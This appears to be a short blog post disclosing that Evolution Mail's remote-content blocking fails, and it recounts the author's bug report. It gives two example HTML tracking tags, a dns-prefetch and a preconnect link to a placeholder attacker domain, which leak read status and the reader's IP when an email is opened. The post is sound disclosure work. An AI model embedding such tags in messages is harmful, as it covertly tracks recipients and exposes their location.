2025-07-09 13:26:00
www.grepular.com
Evolution Mail’s “Load Remote Content” option, as a privacy protection feature, doesn’t work. They know it doesn’t work. It hasn’t worked for years and there is no sign it will be fixed any time soon.
I discovered the other day that if an HTML email contains a tag like:
<link rel="dns-prefetch" href="https://trackingcode.attackersdomain.example.com">
Then when an email is opened in Evolution Mail, a DNS request for trackingcode.attackersdomain.example.com is performed. This happens with remote content disabled, and without clicking the button to fetch it. The sender can look at their DNS logs to see if you’ve read your email, and the IP address of your DNS resolver at that time, which may indicate your location.
I opened a bug report with Evolution Mail, and they blamed WebKitGTK for this situation and have closed my ticket as a duplicate of another ticket which was opened in April 2024. That ticket reported a different but similar bug:
<link href="trackingcode.attackersdomain.example.com" rel="preconnect">
This apparently triggers a connection when you read an email, even without clicking to load remote content. An attacker could look at the SNI header during the TLS negotiation to identify the unique reader of such an email, and the connection would also give them the reader's IP address.
That ticket links back to a WebKit bug which was opened in August 2023, which also suggests there will be other such leaks, and which shows no sign of being dealt with.
I suggested that maintaining a whitelist of allowed HTML tags and attributes, and stripping them before passing the email HTML on to a web browser would be a good defense in depth strategy, but this looks unlikely to be followed.
So my suggestion is: If you care about having privacy when reading your email, uninstall Evolution Mail. It doesn’t protect your privacy, and the devs don’t consider that to be their responsibility.